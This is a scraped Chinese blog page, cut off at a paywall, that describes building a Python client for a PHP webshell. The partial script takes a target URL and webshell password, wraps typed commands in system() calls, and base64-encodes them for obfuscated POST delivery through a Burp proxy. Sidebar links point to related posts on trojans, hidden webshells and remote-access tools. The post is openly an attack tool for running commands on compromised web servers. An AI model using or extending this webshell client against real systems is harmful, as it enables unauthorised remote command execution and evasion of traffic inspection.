Python连接PHP木马,并加密传输数据

已于 2023-03-16 13:10:10 修改
阅读量1.9k 收藏 32
点赞数 2
分类专栏: Web安全 python PHP 文章标签: python php web安全
于 2022-05-26 10:50:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/124979809
版权

前面写过两篇,但写的不多。

使用python连接JSP一句话木马
使用burpsuite对python的post请求进行抓包

今天想起来,于是整合一下,再搞个加密。

base64

先是在 Linux 虚拟机里面写个 “两句话木马”。
在这里插入图片描述
对传参进行一个 base64 解码,这就意味着在 Windows 本机上要进行一个 base64 编码。

import requests
import base64


url = input('目标URL:')      # http://192.168.xxx.xxx/shell.php
pwd = input('连接密码:')      # 其实就是一句话木马中的变量shell

# 用于 burpsuite抓包
proxy = {
   
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}

while(True):
    cmd = input('输入执行的命令:')
    send = "system(\'" + cmd + "\');"
    connect = base64.b64encode(send.encode('utf-8'))
    # 将命令传给一句话木马
    payloads = {
   
        pwd
最低0.47元/天 解锁文章
hangshao0.0
关注
专栏目录
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
python+php一句话木马的利用
CYLK1987310466的博客
07-29 1400
python知识点,php一句话木马
Python连接PHP木马的后续分析(书接上回)
分享与记录
06-10 868
前面写的: Python连接PHP木马,并加密传输数据如果在服务器上写入最经典的那个一句话木马 ,然后传一个 命令,不进行加密,代码如下: 那么抓取的流量如下:如果先进行 AES 加密,再使用 base64 编码,代码如下: 那么抓取的流量如下: 可以看出加密与不加密的效果对比。其实可以看到,我在 Python 代码里实现了加密,在 PHP 木马中实现了解密,因此,也就变成了 。如果仅仅通过一句话实现各种功能,同时还要实现流量的混淆该怎么做呢?那不就是蚁剑吗?(蚁剑本身是不加密的)虽然蚁剑可以通过一句话
python连接php_PHP+Python,轻量维护超轻松
weixin_39528289的博客
12-10 110
window下安装Python直接去Python官网下载msi安装程序安装即可(选择自定义安装才能修改程序安装路径哦)widows下Python数据库访问模块PyMysql的安装1.open the cmd execute the following command or enter "cmd /k "cd \PythonScriptPath\"" to a batch file and exe...
Msfvenom木马攻防中的数据加密与解密技巧
# 1. 简介与背景 #### 1.1 Msfvenom木马简介 Msfvenom是Metasploit Framework中的一个强大工具,用于生成各种类型的恶意软件Payload(载荷)。Payload是指在攻击过程...#### 1.2 数据加密与解密在木马攻防中的重要性
python PHP 源码 加密,AES加密例子(pythonphp版本)
weixin_39608526的博客
03-25 219
python版本输入的加密字符必须是16的倍数,php的默认补零,所以解密的时候还需要rtrim掉零。python没有自动做这件事情,所以要自己补零。class MyCrypt():def __init__(self, key):self.key = keyself.mode = AES.MODE_CBCself.padding = '\0'def encrypt(self, text):cryp...
php连接python_如何连接PHPPython
weixin_42397335的博客
01-28 556
我有2个系统,我用PHP构建接口,机器是用python构建的,因为我在python中使用fuzzy。在我必须试着用PHP获得具体的数据我用python编写了一个函数来接收一个变量但我有个问题问题是,如何使用PHP从MySQL抛出一个变量,然后用python处理它?在在完成这个过程之后,如何将结果返回到PHP,然后发送到mySQL数据库?在php中的代码是这样的,代码是从sql中获取数据的funct...
python写一个能生成三种一句话木马的脚本
weixin_30782293的博客
02-07 1336
代码: import time import os from threading import Thread import optparse def aspyijuhua(): try: juy=open('caidao.asp','w') asp="<%IfRequest(",'1',")<>""ThenExecuteGlob...
php 木马的分析(加密破解)
12-17
分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。解码解压缩代码如下:复制代码 代码如下:<?php function writetofile($filename, $data) { //File Writing $filenum=@fopen($filename,”w”); if (!$filenum) { return false; } flock($filenum,LOCK_EX); $file_data=fwrite($filenum,$data)
python编写木马攻击_python实现一个简单木马
weixin_39646018的博客
12-05 6124
一个简单的木马程序绝大多数的木马程序都是基于Socket来实现的废话少说直接上代码!代码:client部分:# -*- coding: UTF-8 -*-import socketimport sysimport reimport osclass Client:def __init__(self, serverIp, serverPort):self.serverIp = serverIp # ...
python实现生成隐藏的一句话木马
qq_55213436的博客
07-28 2207
这个webshell的原理就是每一行最后都有空格与制表符。\t的数量代表着ascii码16进制的第一位,空格的数量代表着ascii码16进制的第二位。然后有个关键的15,其实代表了前15行的空白字符组成的是create_function,后面就可以写一句话咯,例如@eval($_GET["pass"]);demo.php这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。...
pythonphp_如何在PythonPHP之间传输数据
weixin_39831567的博客
11-23 137
I have a Python script that outputs a bunch of text to PHP using print and shell_exec(). I also have to send a dictionary between the two, to store some script information. Here is a simplified versio...
php连接python_PHP字符串的连接的简单例子
weixin_29691667的博客
02-28 107
PHP字符串的连接的简单例子分类:PHP_Python| 发布:佚名| 查看: | 发表时间:2014/1/9很多时候我们需要将几个字符串连接起来显示,在PHP中,字符串之间使用“点”来连接,也就是英文中的句号”.”,具体使用方式如下:代码如下://定义字符串$str1 = "Hello World!";$str2 = "Welcome to HutaoW's BLOG!";//连接上面两个字符串...
python木马程序设计_基于HTTP的Python特洛伊木马程序,用于远程系统取证和特权转移
weixin_26722031的博客
07-30 1305
python木马程序设计 总览 (Overview) In this article, we will be building a python based trojan that does the following: 在本文中,我们将构建一个执行以下操作的基于python木马: Download remotely unrelated code to the trojan and run i...
基于Python/Socket实现小型的远程木马(包含实验)
BrosyveryOK的博客
10-05 2710
本文是用 Python 的 Socket 模块进行的服务搭建,主要是基于TCP服务的远程木马,因此要掌握一点TCP服务搭建的知识,可以参考我的另一篇文章,结合网上搜索的知识,搭建TCP服务器和客户端,然后再进行实验。用Python搭建非常简易的TCP客户端和服务器_br0sy的博客-CSDN博客还要用到 Python 的 os 模块,进行命令操作,接下去话不多说,直接开始写代码。
动手实现简易PHP一句话连接工具——FruitKnife
垃圾管理员的垃圾站
08-24 1803
文章目录效果展示连接一句话浏览服务器目录打开文件跳转目录上传文件前言设计思路与需求分析功能实现连接一句话浏览目录打开文件跳转路径上传文件节目清单不足之处工具名字的由来关于系列另外两个小工具简易版HTTP报文截获工具——CatcherExif信息编辑器——ExifEditor 效果展示 连接一句话 浏览服务器目录 打开文件 跳转目录 上传文件 前言 小工具由Python语言实现,虽然并不复杂,但是为了能够更好地理解以下内容,需要读者具有PHP语言基础(能看懂代码就行,不必具有开发能力),并在阅读本文
Python连接MySQL问题解析:加密与驱动设置
首先,当安装MySQL时,如果选择了"Use Strong Password Encryption for Authentication",可能会导致连接失败,因为这种加密方式与Python的mysql-connector模块不兼容。解决方法是选择"Use Legacy Authentication ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值